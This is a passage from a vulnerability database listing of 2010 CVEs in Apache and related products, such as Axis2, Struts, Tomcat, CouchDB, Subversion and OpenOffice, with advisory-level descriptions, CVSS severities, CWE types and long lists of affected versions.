Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache axis2 1.4.1
apache axis2 *
apache axis2 1.4
apache axis2 1.5
apache axis2 1.3
CVE-2010-1870 MEDIUM

The OGNL extensive expression evaluation capability in XWork in Struts 2.0.0 through 2.1.8.1, as used in Atlassian Fisheye, Crucible, and possibly other products, uses a permissive whitelist, which allows remote attackers to modify server-side context objects and bypass the "#" protection mechanism in ParameterInterceptors via the (1) #context, (2) #_memberAccess, (3) #root, (4) #this, (5) #_typeResolver, (6) #_classResolver, (7) #_traceEvaluations, (8) #_lastEvaluation, (9) #_keepLastEvaluation, and possibly other OGNL context variables, a different vulnerability than CVE-2008-6504.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.0.9
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.0.7
apache struts 2.1.5
apache struts 2.0.8
apache struts 2.1.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.1
apache struts 2.0.3
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.1.4
apache struts 2.0.5
apache struts 2.1.6
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.0.12
apache struts 2.1.2
apache struts 2.0.14
apache struts 2.0.0
CVE-2010-2057 MEDIUM

shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache myfaces 1.1.6
apache myfaces 1.1.3
apache myfaces 1.2.8
apache myfaces 1.1.1
apache myfaces 1.1.5
apache myfaces 1.2.3
apache myfaces 1.1.2
apache myfaces 1.1.7
apache myfaces 1.1.0
apache myfaces 1.1.4
apache myfaces 1.2.5
apache myfaces 2.0.0
apache myfaces 1.2.2
apache myfaces 1.2.4
apache myfaces 1.2.7
apache myfaces 1.2.6
CVE-2010-2068 MEDIUM

mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache http_server 2.2.10
apache http_server 2.3.5
apache http_server 2.2.9
apache http_server 2.2.14
apache http_server 2.2.15
apache http_server 2.3.4
apache http_server 2.2.13
apache http_server 2.2.11
apache http_server 2.2.12
CVE-2010-2076 HIGH

Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-829,

Products Affected

Vendor Product Version
apache cxf 2.2.5
apache cxf 2.0.4
apache cxf 2.1.5
apache cxf 2.0.5
apache cxf 2.2.2
apache cxf 2.0.2
apache cxf 2.1.3
apache cxf 2.1.2
apache cxf 2.1.6
apache cxf 2.0.12
apache cxf 2.0.6
apache cxf 2.1.7
apache cxf 2.2.6
apache cxf 2.0.8
apache cxf 2.0.10
apache cxf 2.2.7
apache cxf 2.2.1
apache cxf 2.0.9
apache cxf 2.1
apache cxf 2.1.8
apache cxf 2.2.3
apache cxf 2.0.1
apache cxf 2.2.8
apache cxf 2.2
apache cxf 2.1.9
apache cxf 2.0.7
apache cxf 2.0.11
apache cxf 2.2.4
apache cxf 2.0
apache cxf 2.0.3
apache cxf *
apache cxf 2.1.4
apache cxf 2.1.1
CVE-2010-2086 MEDIUM

Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache myfaces 1.2.8
apache myfaces 1.1.7
CVE-2010-2103 MEDIUM

Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache axis2 1.5.1
apache axis2 1.4.1
CVE-2010-2227 MEDIUM

Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache tomcat 5.5.14
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 5.5.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2010-2232 MEDIUM

In Apache Derby 10.1.2.1, 10.2.2.0, 10.3.1.4, and 10.4.1.3, Export processing may allow an attacker to overwrite an existing file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache derby 10.4.1.3
apache derby 10.3.1.4
apache derby 10.1.2.1
apache derby 10.2.2.0
CVE-2010-2234 MEDIUM

Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache couchdb 0.9.0
apache couchdb 0.8.1
apache couchdb 0.9.1
apache couchdb 0.10.0
apache couchdb 0.10.1
apache couchdb 0.8.0
apache couchdb 0.9.2
apache couchdb 0.11.0
CVE-2010-2245 MEDIUM

XML External Entity (XXE) vulnerability in Apache Wink 1.1.1 and earlier allows remote attackers to read arbitrary files or cause a denial of service via a crafted XML document.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache wink *
CVE-2010-2791 MEDIUM

mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache http_server 2.2.9
CVE-2010-2952 MEDIUM

Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache traffic_server 2.1.1
apache traffic_server 2.1.0
apache traffic_server *
CVE-2010-2953 MEDIUM

Untrusted search path vulnerability in a certain Debian GNU/Linux patch for the couchdb script in CouchDB 0.8.0 allows local users to gain privileges via a crafted shared library in the current working directory.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache couchdb 0.8.0
CVE-2010-3083 MEDIUM

sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
redhat enterprise_mrg 1.0.2
redhat enterprise_mrg 1.1.2
apache qpid 0.5
apache qpid 0.6
redhat enterprise_mrg 1.0
redhat enterprise_mrg *
redhat enterprise_mrg 1.0.1
redhat enterprise_mrg 1.0.3
redhat enterprise_mrg 1.1.1
CVE-2010-3315 MEDIUM

authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-16,

Products Affected

Vendor Product Version
apache subversion 1.5.5
apache subversion 1.5.7
apache subversion 1.6.7
apache subversion 1.6.0
apache subversion 1.6.6
apache subversion 1.6.10
apache subversion 1.5.3
apache subversion 1.6.12
apache subversion 1.5.2
apache subversion 1.6.11
apache subversion 1.5.0
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.5.1
apache subversion 1.6.1
apache subversion 1.6.2
apache subversion 1.6.9
apache subversion 1.6.3
apache subversion 1.6.5
apache subversion 1.5.4
apache subversion 1.5.6
CVE-2010-3449 MEDIUM

Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1; and Apache Continuum 1.3.6, 1.4.0, and 1.1 through 1.2.3.1; allows remote attackers to hijack the authentication of administrators for requests that modify credentials.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache archiva 1.1.3
jesse_mcconnell redback 1.2.2
apache archiva 1.1.4
apache archiva 1.2
jesse_mcconnell redback *
apache archiva 1.2.2
apache archiva 1.3.1
jesse_mcconnell redback 1.1.2
jesse_mcconnell redback 1.0.2
apache archiva 1.2.1
jesse_mcconnell redback 1.0
jesse_mcconnell redback 1.0.1
jesse_mcconnell redback 1.1
jesse_mcconnell redback 1.0.3
jesse_mcconnell redback 1.2.1
apache archiva 1.3
jesse_mcconnell redback 1.2
jesse_mcconnell redback 1.1.1
apache archiva 1.1.1
apache archiva 1.0.1
apache archiva 1.0.3
apache archiva 1.1
apache archiva 1.1.2
apache archiva 1.0
apache archiva 1.0.2
CVE-2010-3450 HIGH

Multiple directory traversal vulnerabilities in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allow remote attackers to overwrite arbitrary files via a .. (dot dot) in an entry in (1) an XSLT JAR filter description file, (2) an Extension (aka OXT) file, or unspecified other (3) JAR or (4) ZIP files.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-22,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.04
debian debian_linux 5.0
apache openoffice *
debian debian_linux 6.0
canonical ubuntu_linux 10.04
canonical ubuntu_linux 10.10
canonical ubuntu_linux 9.10
CVE-2010-3451 HIGH

Use-after-free vulnerability in oowriter in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via malformed tables in an RTF document.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-416,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.04
debian debian_linux 5.0
apache openoffice *
debian debian_linux 6.0
canonical ubuntu_linux 10.04
canonical ubuntu_linux 10.10
canonical ubuntu_linux 9.10
CVE-2010-3452 HIGH

Use-after-free vulnerability in oowriter in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via crafted tags in an RTF document.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-416,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.04
debian debian_linux 5.0
apache openoffice *
debian debian_linux 6.0
canonical ubuntu_linux 10.04
canonical ubuntu_linux 10.10
canonical ubuntu_linux 9.10
CVE-2010-3453 HIGH

The WW8ListManager::WW8ListManager function in oowriter in OpenOffice.org (OOo) 2.x and 3.x before 3.3 does not properly handle an unspecified number of list levels in user-defined list styles in WW8 data in a Microsoft Word document, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted .DOC file that triggers an out-of-bounds write.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-787,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.04
debian debian_linux 5.0
apache openoffice *
debian debian_linux 6.0
canonical ubuntu_linux 10.04
canonical ubuntu_linux 10.10
canonical ubuntu_linux 9.10
CVE-2010-3454 HIGH

Multiple off-by-one errors in the WW8DopTypography::ReadFromMem function in oowriter in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via crafted typography information in a Microsoft Word .DOC file that triggers an out-of-bounds write.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-193,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.04
debian debian_linux 5.0
apache openoffice *
debian debian_linux 6.0
canonical ubuntu_linux 10.04
canonical ubuntu_linux 10.10
canonical ubuntu_linux 9.10
CVE-2010-3689 MEDIUM

soffice in OpenOffice.org (OOo) 3.x before 3.3 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse shared library in the current working directory.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.04
debian debian_linux 5.0
apache openoffice *
debian debian_linux 6.0
canonical ubuntu_linux 10.04
canonical ubuntu_linux 10.10
canonical ubuntu_linux 9.10
CVE-2010-3718 LOW

Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2010-3854 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache couchdb 0.8.1
apache couchdb 0.9.1
apache couchdb 0.10.0
apache couchdb 0.9.2
apache couchdb 0.11.0
apache couchdb 1.0.0
apache couchdb 0.11.2
apache couchdb 0.9.0
apache couchdb 1.0.1
apache couchdb 0.10.1
apache couchdb 0.8.0
apache couchdb 0.11.1
apache couchdb 0.10.2
CVE-2010-3863 MEDIUM

Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
jsecurity jsecurity 0.9.0
apache shiro *
CVE-2010-3872 HIGH

A flaw was found in the mod_fcgid module of httpd. A malformed FastCGI response may result in a stack-based buffer overflow in the modules/fcgid/fcgid_bucket.c file in the fcgid_header_bucket_read() function, resulting in an application crash.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
secalert@redhat.com 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-121,CWE-189,

Products Affected

Vendor Product Version
apache mod_fcgid 2.3.4
apache mod_fcgid 2.3.2
apache mod_fcgid 2.3.1
apache mod_fcgid 2.3.3
apache mod_fcgid *
CVE-2010-4008 MEDIUM

libxml2 before 2.7.8, as used in Google Chrome before 7.0.517.44, Apple Safari 5.0.2 and earlier, and other products, reads from invalid memory locations during processing of malformed XPath expressions, which allows context-dependent attackers to cause a denial of service (application crash) via a crafted XML document.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_eus 6.3
apple mac_os_x *
apple safari *
apache openoffice *
debian debian_linux 6.0
opensuse opensuse 11.3
canonical ubuntu_linux 10.04
apple iphone_os *
apple itunes *
canonical ubuntu_linux 10.10
redhat enterprise_linux_desktop 6.0
opensuse opensuse 11.2
xmlsoft libxml2 *
opensuse opensuse 11.1
canonical ubuntu_linux 8.04
debian debian_linux 5.0
canonical ubuntu_linux 6.06
redhat enterprise_linux_server 6.0
suse suse_linux_enterprise_server 10
suse suse_linux_enterprise_server 11
redhat enterprise_linux_workstation 6.0
google chrome *
canonical ubuntu_linux 9.10
CVE-2010-4172 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.1
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 6.0.13
apache tomcat 6.0.16
apache tomcat 7.0.2
apache tomcat 6.0.27
apache tomcat 6.0.19
apache tomcat 6.0.24
apache tomcat 6.0.26
apache tomcat 6.0.18
apache tomcat 6.0.29
apache tomcat 7.0.0
apache tomcat 6.0.12
apache tomcat 6.0.14
apache tomcat 6.0.17
apache tomcat 6.0.20
CVE-2010-4253 HIGH

Heap-based buffer overflow in Impress in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted PNG file in an ODF or Microsoft Office document, as demonstrated by a PowerPoint (aka PPT) document.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-787,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.04
debian debian_linux 5.0
apache openoffice *
debian debian_linux 6.0
canonical ubuntu_linux 10.04
canonical ubuntu_linux 10.10
canonical ubuntu_linux 9.10
CVE-2010-4312 MEDIUM

The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-16,

Products Affected

Vendor Product Version
apache tomcat 6.0.28
apache tomcat 6.0
apache tomcat 6.0.13
apache tomcat 6.0.7
apache tomcat 6.0.1
apache tomcat 6.0.27
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.8
apache tomcat 6.0.18
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 6.0.20
apache tomcat 6.0.10
apache tomcat 6.0.15
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 6.0.11
apache tomcat 6.0.19
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 6.0.5
apache tomcat 6.0.3
apache tomcat 6.0.14
apache tomcat 6.0.17
CVE-2010-4340 MEDIUM

libcloud before 0.4.1 does not verify SSL certificates for HTTPS connections, which allows remote attackers to spoof certificates and bypass intended access restrictions via a man-in-the-middle (MITM) attack.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache libcloud *
apache libcloud 0.3.0
apache libcloud 0.3.1
apache libcloud 0.2.0
CVE-2010-4408 MEDIUM

Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache archiva 1.1.3
apache archiva 1.3
apache archiva 1.1.4
apache archiva 1.2
apache archiva 1.1.1
apache archiva 1.0.1
apache archiva 1.0.3
apache archiva 1.2.2
apache archiva 1.3.1
apache archiva 1.1
apache archiva 1.2.1
apache archiva 1.1.2
apache archiva 1.0
apache archiva 1.0.2
CVE-2010-4494 HIGH

Double free vulnerability in libxml2 2.7.8 and other versions, as used in Google Chrome before 8.0.552.215 and other products, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to XPath handling.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-415,

Products Affected

Vendor Product Version
hp insight_control_server_deployment *
apple mac_os_x *
apple safari *
apache openoffice *
debian debian_linux 6.0
opensuse opensuse 11.3
apple iphone_os *
apple itunes *
hp rapid_deployment_pack *
redhat enterprise_linux_desktop 6.0
opensuse opensuse 11.2
xmlsoft libxml2 *
fedoraproject fedora 14
debian debian_linux 5.0
redhat enterprise_linux_server 6.0
suse suse_linux_enterprise_server 11
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_eus 6.3
google chrome *
CVE-2010-4539 MEDIUM

The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache subversion 0.28.2
apache subversion 0.7
apache subversion 0.8
apache subversion 0.28.0
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
apache subversion 0.28.1
apache subversion 0.33.0
apache subversion 1.5.6
apache subversion 0.25.0
apache subversion 0.14.5
apache subversion 1.1.2
apache subversion 0.16
apache subversion 1.4.3
apache subversion 1.0.4
apache subversion 0.35.0
apache subversion 1.0.8
apache subversion 1.6.12
apache subversion 0.17.0
apache subversion 1.6.13
apache subversion 0.32.1
apache subversion 1.0.0
apache subversion 1.6.3
apache subversion 0.18.0
apache subversion 1.5.8
apache subversion 1.2.3
apache subversion 0.13.1
apache subversion 1.0.5
apache subversion 1.5.5
apache subversion 0.22.0
apache subversion 1.6.0
apache subversion 0.23.0
apache subversion m3
apache subversion 1.5.2
apache subversion 0.12.0
apache subversion 0.14.0
apache subversion 1.6.8
apache subversion 1.2.1
apache subversion 0.14.3
apache subversion 0.27.0
apache subversion 1.4.6
apache subversion 0.14.4
apache subversion 0.10.0
apache subversion 1.6.7
apache subversion 1.4.4
apache subversion 1.3.0
apache subversion 1.6.10
apache subversion 0.35.1
apache subversion 0.24.1
apache subversion 1.0.3
apache subversion 1.6.1
apache subversion 0.31.0
apache subversion 0.30.0
apache subversion 0.36.0
apache subversion 1.4.0
apache subversion 0.10.2
apache subversion 0.22.1
apache subversion 0.9
apache subversion 1.3.2
apache subversion 1.6.6
apache subversion 1.5.3
apache subversion m1
apache subversion 1.0.6
apache subversion 0.29.0
apache subversion 1.6.11
apache subversion 0.14.2
apache subversion 0.24.2
apache subversion 0.34.0
apache subversion 0.21.0
apache subversion 1.0.2
apache subversion 1.0.7
apache subversion 0.15
apache subversion 1.3.1
apache subversion 0.26.0
apache subversion 0.33.1
apache subversion *
apache subversion 0.10.1
apache subversion 0.13.2
apache subversion 0.13.0
apache subversion 1.1.4
apache subversion 0.17.1
apache subversion 0.19.1
apache subversion 1.0.1
apache subversion 1.1.0
apache subversion 1.6.5
apache subversion 0.20.0
apache subversion 0.20.1
apache subversion 0.24.0
apache subversion 1.5.7
apache subversion 0.37.0
apache subversion 0.11.1
apache subversion m2
apache subversion 0.22.2
apache subversion 0.18.1
apache subversion 1.6.4
apache subversion 1.6.9
apache subversion 1.0.9
apache subversion 1.5.4
apache subversion 1.1.3
apache subversion 1.4.2
apache subversion 0.19.0
apache subversion 1.2.0
apache subversion 1.4.5
apache subversion 0.16.1
apache subversion 0.14.1
apache subversion 1.1.1
apache subversion 1.2.2
apache subversion m4/m5
apache subversion 0.6
apache subversion 1.4.1
CVE-2010-4643 HIGH

Heap-based buffer overflow in Impress in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted Truevision TGA (TARGA) file in an ODF or Microsoft Office document.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2010-4644 LOW

Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.

CVSS 2.0

Severity: LOW

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache subversion 0.28.2
apache subversion 0.7
apache subversion 0.8
apache subversion 0.28.0
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
apache subversion 0.28.1
apache subversion 0.33.0
apache subversion 1.5.6
apache subversion 0.25.0
apache subversion 0.14.5
apache subversion 1.1.2
apache subversion 0.16
apache subversion 1.4.3
apache subversion 1.0.4
apache subversion 0.35.0
apache subversion 1.0.8
apache subversion 1.6.12
apache subversion 0.17.0
apache subversion 1.6.13
apache subversion 0.32.1
apache subversion 1.0.0
apache subversion 1.6.3
apache subversion 0.18.0
apache subversion 1.5.8
apache subversion 1.2.3
apache subversion 0.13.1
apache subversion 1.0.5
apache subversion 1.5.5
apache subversion 0.22.0
apache subversion 1.6.0
apache subversion 0.23.0
apache subversion m3
apache subversion 1.5.2
apache subversion 0.12.0
apache subversion 0.14.0
apache subversion 1.6.8
apache subversion 1.2.1
apache subversion 0.14.3
apache subversion 0.27.0
apache subversion 1.4.6
apache subversion 0.14.4
apache subversion 0.10.0
apache subversion 1.6.7
apache subversion 1.4.4
apache subversion 1.3.0
apache subversion 1.6.10
apache subversion 0.35.1
apache subversion 0.24.1
apache subversion 1.0.3
apache subversion 1.6.1
apache subversion 0.31.0
apache subversion 0.30.0
apache subversion 0.36.0
apache subversion 1.4.0
apache subversion 0.10.2
apache subversion 0.22.1
apache subversion 0.9
apache subversion 1.3.2
apache subversion 1.6.6
apache subversion 1.5.3
apache subversion m1
apache subversion 1.0.6
apache subversion 0.29.0
apache subversion 1.6.11
apache subversion 0.14.2
apache subversion 0.24.2
apache subversion 0.34.0
